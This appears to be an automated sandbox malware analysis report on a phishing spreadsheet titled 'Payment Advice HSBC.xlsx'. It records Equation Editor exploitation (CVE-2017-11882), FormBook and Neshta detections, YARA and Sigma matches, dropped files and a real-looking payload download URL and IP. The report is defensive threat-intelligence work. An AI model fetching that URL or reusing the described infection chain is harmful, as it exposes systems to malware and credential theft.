Play interactive tour

Edit tour

Windows Analysis Report Payment Advice HSBC.xlsx

Overview

General Information

Sample Name:	Payment Advice HSBC.xlsx
Analysis ID:	528781
MD5:	e8e4ccc6201dd1b16a2133ba56441a5b
SHA1:	f73a1fd7b0aea60425fef3e155cce42e2edfac21
SHA256:	f1da130d39c64d903450d67844ba701667cce9b057eeac8283393c5d2673b5e5
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook Neshta

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Neshta

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Infects executable files (exe, dll, sys, html)

Drops PE files with a suspicious file extension

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Drops executable to a common third party application directory

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Drops PE files to the user root directory

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Unable to load, office file is protected or invalid

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Enables debug privileges

PE file does not import any functions

Installs a raw input device (often for capturing keystrokes)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Office Equation Editor has been started

Drops PE files to the user directory

PE file overlay found

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2688 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 3020 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 1624 cmdline: "C:\Users\Public\vbc.exe" MD5: 748F5D75A9F4C4026CC14E46BAFF0BB3)

vbc.exe (PID: 2576 cmdline: C:\Users\Public\vbc.exe MD5: 748F5D75A9F4C4026CC14E46BAFF0BB3)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x30d81:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x58385:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x42d85:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x16ac9:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16de1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x170c5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x173bd:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x176b5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x179c1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17cb5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17fb5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x182bd:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x185ad:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1889d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18b8d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18e99:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x191ad:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x194b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x197b5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19aad:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19dc1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a0b9:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a3a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a6b5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x27488:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x27812:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa725:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xa211:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xa827:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xa99f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2822a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x948c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x28fa2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xfc17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10cba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xcb49:$sqlite3step: 68 34 1C 7B E1 0xcc5c:$sqlite3step: 68 34 1C 7B E1 0xcb78:$sqlite3text: 68 38 2A 90 C5 0xcc9d:$sqlite3text: 68 38 2A 90 C5 0xcb8b:$sqlite3blob: 68 53 D8 7F 8C 0xccb3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.469402863.0000000000400000.00000040.00000001.sdmp	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000005.00000000.466923037.0000000000400000.00000040.00000001.sdmp	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000005.00000000.468925310.0000000000400000.00000040.00000001.sdmp	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000000.467300347.0000000000400000.00000040.00000001.sdmp	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000005.00000000.468071854.0000000000400000.00000040.00000001.sdmp	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000000.468443002.0000000000400000.00000040.00000001.sdmp	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
00000005.00000000.467692423.0000000000400000.00000040.00000001.sdmp	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x274c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x27852:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa765:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xa251:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xa867:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xa9df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2826a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x94cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x28fe2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xfc57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10cfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xcb89:$sqlite3step: 68 34 1C 7B E1 0xcc9c:$sqlite3step: 68 34 1C 7B E1 0xcbb8:$sqlite3text: 68 38 2A 90 C5 0xccdd:$sqlite3text: 68 38 2A 90 C5 0xcbcb:$sqlite3blob: 68 53 D8 7F 8C 0xccf3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 1624	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.vbc.exe.400000.15.raw.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.9.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.17.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.7.raw.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.9.raw.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.5.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.11.raw.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.11.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.19.raw.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.2.vbc.exe.400000.1.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.2.vbc.exe.400000.1.unpack	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
5.0.vbc.exe.400000.13.raw.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.19.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.17.raw.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.13.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.15.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.0.vbc.exe.400000.7.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.2.vbc.exe.400000.1.raw.unpack	MAL_Neshta_Generic	Detects Neshta malware	Florian Roth	0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
5.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
Click to see the 14 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.12.91.205, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3020, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3020, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3020, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1624

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Payment Advice HSBC.xlsx	Virustotal: Detection: 34%			Perma Link
Source: Payment Advice HSBC.xlsx	ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://198.12.91.205/50005/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://198.12.91.205/50005/vbc.exe

Virustotal: Detection: 5%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
